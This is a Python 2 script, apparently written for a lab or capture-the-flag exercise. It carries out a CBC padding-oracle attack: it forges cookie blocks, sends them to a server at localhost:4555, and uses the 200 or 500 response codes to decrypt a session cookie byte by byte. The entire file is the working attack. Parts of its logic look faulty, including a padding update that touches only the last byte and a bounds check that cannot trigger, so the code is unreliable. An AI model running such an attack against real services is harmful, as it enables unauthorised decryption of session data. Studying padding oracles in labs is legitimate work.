#!/usr/bin/env python2
import base64
import sys

import requests


URL = 'http://localhost:4555'


def main(cookie):
    cookie = base64.b64decode(cookie)
    cookies = [cookie[i:i+16] for i in range(0, len(cookie), 16)]
    plaintext = bytearray()

    for idx, cookie in enumerate(cookies[1:]):
        intermediary = bytearray(16)

        for i in range(15, -1, -1):
            code = 500
            while code != 200:
                intermediary[i] += 1
                if intermediary[i] > 255:
                    print 'ERROR: exceeded bounds of index {}'.format(i)
                    print ''.join('{:02x}'.format(x) for x in intermediary)
                    return

                test_cookie = base64.b64encode(intermediary + cookie)

                resp = requests.get(URL, cookies={'user': test_cookie})
                code = resp.status_code

            if i:
                intermediary[-1] ^= (16 - i) ^ (16 - i + 1)

        # print ''.join('{:02x}'.format(x) for x in intermediary)
        padding = bytearray(list(range(15, 0, -1)) + [16])
        intermediate = bytearray(x ^ y for x, y in zip(intermediary, padding))

        plaintext += bytearray(x ^ y for x, y in zip(bytearray(cookies[idx]),
                                                     intermediate))

    return ''.join(chr(x) for x in plaintext)


if __name__ == '__main__':
    try:
        decoded = main(sys.argv[1])
    except IndexError:
        print 'usage: ./decrypt <cookie>'
        sys.exit(1)

    print decoded
